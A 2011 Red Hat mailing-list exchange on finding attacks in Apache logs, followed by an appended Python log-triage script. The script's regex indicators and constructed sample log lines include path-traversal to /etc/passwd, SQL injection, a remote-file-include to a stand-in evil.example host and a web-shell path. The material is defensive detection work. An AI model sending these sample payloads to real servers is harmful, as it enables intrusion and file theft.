Re: forensic Apache log analysis



This looks interesting. As you say, it is not a solution for my actual
problem, but it is interesting to use in other systems.

My logs, I think, aren't compromised because they are not stored on the
same machine that is running Apache. So I think I can rely on them...

greetings and thanks for your help


2011/7/27 Georgios Magklaras <georgios@xxxxxxxxxxxxx>

> On 07/27/2011 08:24 AM, ESGLinux wrote:
>> Hi All,
>> I have a problem with a RHEL server and I want to ask you for some advice.
>> I'm not a security expert so I don't know which can be the best approach to
>> solve my problem.
>> The problem is that I have several GigaBytes of Apache logs and I need to
>> look for attacks on it to check if the server has been compromised.
>> I can manually check some possible attack URLs and look for them in the
>> logs, but I'm sure there must be tools or techniques to do this in the
>> correct way.
>> So, any idea that can help me?
>> Thank you very much in advance,
>> ESG
> The tools the others suggested are fine; however, normally the culprit
> with this approach is that you should not rely on the application logs:
> experience often shows that logs that stay on the suspected compromised
> system might be tampered with/compromised. This is contrary to the idea of
> forensics, where you should have at a minimum something off the client
> system to ensure some level of confidence in a post mortem examination.
> In the future, please do take a look at LUARM:
> .
> Make sure you get the latest version of it from svn by doing a:
> svn co https://luarm.svn.sourceforge.net/svnroot/luarm luarm
> and then follow the README for setup instructions. A case where I used
> LUARM to detect a botnet-compromised LAMP is here:
> http://epistolatory.blogspot.com/2011/02/catching-undesired-guest-in-penguin-tmp.html
> Please do feel free to pass feedback.
> GM
> --
> George Magklaras PhD
> RHCE no: 805008309135525
> Senior Systems Engineer/IT Manager
> Biotek Center, University of Oslo
> EMBnet TMPC Chair
> Tel: +47 22840535
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
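One way to triage a large access log for the kind of attack requests this thread is asking about, as an added Python example that is not part of the thread and not LUARM's code: it parses Apache combined-format lines, URL-decodes the request target, flags a small assumed starter set of indicator patterns, counts 404 bursts per client and keeps any line it could not parse. The sample log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Assumed starter list of request-level indicators; deliberately broad for triage, so expect noise
INDICATORS = {
    "path traversal": re.compile(r"\.\./|/etc/passwd|/proc/self"),
    "sql injection": re.compile(r"(?i)union\s+select|or\s+1\s*=\s*1|'\s*or\s*'"),
    "remote file include": re.compile(r"(?i)[?&]\w+=(https?|ftp)://"),
    "web shell / upload path": re.compile(r"(?i)/(tmp|uploads)/[\w-]+\.php"),
}

def analyze(lines, scan_threshold=5):
    """Return (findings, unparsed). Findings flag matching requests and 404 bursts per client IP."""
    findings, unparsed, not_found = [], [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            unparsed.append(line)  # never silently drop lines in a forensic pass
            continue
        rec = m.groupdict()
        target = unquote(unquote(rec["target"]))  # decode twice to catch %25-encoded probes
        for kind, pattern in INDICATORS.items():
            if pattern.search(target):
                findings.append({"ip": rec["ip"], "kind": kind, "target": rec["target"], "status": rec["status"]})
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
    for ip, n in not_found.items():
        if n >= scan_threshold:  # many 404s from one host usually means a scanner or guessing tool
            findings.append({"ip": ip, "kind": "404 burst (scanner?)", "count": n})
    return findings, unparsed

# Constructed sample lines (not from any real server); addresses and times are arbitrary
SAMPLE = [
    '10.0.0.5 - - [27/Jul/2011:08:24:01 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Jul/2011:08:24:02 +0200] "GET /cgi-bin/view.cgi?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 210 "-" "curl/7.19"',
    '10.0.0.7 - - [27/Jul/2011:08:24:03 +0200] "GET /products.php?id=1%27%20OR%201%3D1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [27/Jul/2011:08:24:04 +0200] "GET /page.php?inc=http://evil.example/x.txt HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.11 - - [27/Jul/2011:08:24:05 +0200] "POST /uploads/sh.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    "this line is not in combined format",
] + [f'10.0.0.9 - - [27/Jul/2011:08:25:0{i} +0200] "GET /admin{i}/ HTTP/1.1" 404 210 "-" "curl/7.19"' for i in range(4)]
```

Run it against the copy of the log kept off the web server, as the reply above recommends; a hit is a lead to correlate with other evidence (file timestamps, process lists, the server's own state), not proof of compromise on its own.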
